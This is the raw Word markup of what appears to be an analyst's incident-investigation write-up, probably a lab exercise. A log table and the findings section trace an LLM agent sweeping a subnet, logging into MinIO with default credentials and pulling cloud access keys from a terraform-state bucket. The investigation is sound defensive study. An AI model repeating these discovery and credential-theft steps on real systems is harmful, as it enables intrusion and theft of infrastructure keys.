          <w:p w14:paraId="2A464033" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="40ABC0F7" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Log Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="4802BABB" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="7E17537D" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4D891A85" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:27:28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2B284141" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2464A1BC" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LinuxProcess_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3CEDF43C" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>python3 -c &lt;base64 subnet sweep 10.4.0.0/24&gt; spawned (PID 4491)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="0A0F5EA0" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="57DA079E" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:27:31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6C9F3256" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="406CE0F9" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LinuxNetwork_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="68672506" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PID 4491 → 10.4.0.20:9000 (MinIO)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="1FFD8B5F" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6FA3C9D3" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:27:33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="736B49CB" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="109A9CAD" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LinuxNetwork_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0315873D" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">PID 4491 → 10.4.0.30:3306 (MySQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="3DC44488" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="25DDB869" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:27:36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1A9A9BA2" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6B6DDA7E" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LinuxNetwork_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="60FD7D3D" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PID 4491 → 10.4.0.40:8848 (Nacos)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="51A05AC5" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6ADA27E1" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:27:39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6ACE0760" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-minio-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="280D7C24" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LLMAgentLogs_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4121BEBB" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tool: probe minio default creds — result: auth ok minioadmin:minioadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="6B8DA8CC" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="257977B7" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:30:35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F3C4FA0" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-minio-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6A83061C" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LLMAgentLogs_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="048F39A7" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tool: adjust parser, refetch — result: credentials.json retrieved from terraform-state bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3FE9F23F" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="07547A01" wp14:textId="0F6599C4">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Analyst Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11E2CCB2" w:rsidP="40786FAC" w:rsidRDefault="11E2CCB2" w14:paraId="0358894C" w14:textId="4EE9B218">
      <w:pPr>
        <w:spacing w:before="160" w:after="40" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, I searched for discovery tactics that the attacker used, since 4 devices were affected in this attack. For this step, I first went to search in the LinuxProcess_CL, to find any processes that could be running a sweep on the network. Upon entering the query, I found a process running in the command line via “python3 -c &lt;base64 subnet sweep 10.4.0.0/24&gt; with a process ID of 4491. Within 5 seconds it mapped 3 targets</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1.10.4.0.20:9000 – MinIO Object Storage</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2.10.4.0.30:3306 – MySQL database</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3.10.4.0.40:8848 –Nacos Config Server</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5043CB0F" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="100" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="726D701E" w:rsidP="40786FAC" w:rsidRDefault="726D701E" w14:paraId="3726269B" w14:textId="1FAD995A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="100" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="25056B12" wp14:anchorId="6FC1407E">
            <wp:extent cx="5943600" cy="2524125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1880344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0344076" name="Picture 1880344076"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1897788133">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2524125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="43E4E8E7" w:rsidP="40786FAC" w:rsidRDefault="43E4E8E7" w14:paraId="69713277" w14:textId="4A18AF10">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="100" w:after="40"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="20BB8FC3" wp14:anchorId="149AEA80">
            <wp:extent cx="5943600" cy="3133725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1401314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1314083" name="Picture 1401314083"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1674728055">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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I then went to the LLMAgent Logs to look for responses from the model by the session key at the same time of the previous attack and found that the subnet sweep also found the credentials for the minioadmin account and that it was able to authenticate those credentials.With that information, the agent was able to make its way into the Main bucket “terraform-state”, which contains the entire cloud infrastructure like servers, databases etc. Within this was also the credentials. Json file, which contains the cloud provider access keys. This would give the attacker full access to spin up servers, access cloud storage, or destroy the infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46EBEC77" w:rsidP="40786FAC" w:rsidRDefault="46EBEC77" w14:paraId="3430FA6C" w14:textId="40945090">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="100" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="5AB263AF" wp14:anchorId="16ECCD27">
            <wp:extent cx="5943600" cy="2171700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="918408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8408173" name="Picture 918408173"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId945191848">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2171700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="516C110E" w:rsidP="40786FAC" w:rsidRDefault="516C110E" w14:paraId="75068E40" w14:textId="6DAAEDF1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="100" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="2AD5C8BC" wp14:anchorId="67BB37AE">
            <wp:extent cx="5943600" cy="704850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1990120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0120472" name="Picture 1990120472"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId82417159">
                      <a:extLst>
